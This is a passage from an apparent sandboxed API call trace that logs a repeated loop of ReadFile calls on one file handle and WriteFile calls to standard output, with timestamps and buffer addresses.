(_FileHandle=4) returned 0x58 [0147.683] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.683] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.684] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.685] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType 
(hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.686] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.686] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, 
lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, 
lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.687] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.687] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, 
lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.688] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.688] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 
[0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.689] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.689] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, 
lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: 
lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.691] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.691] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.692] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.692] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] 
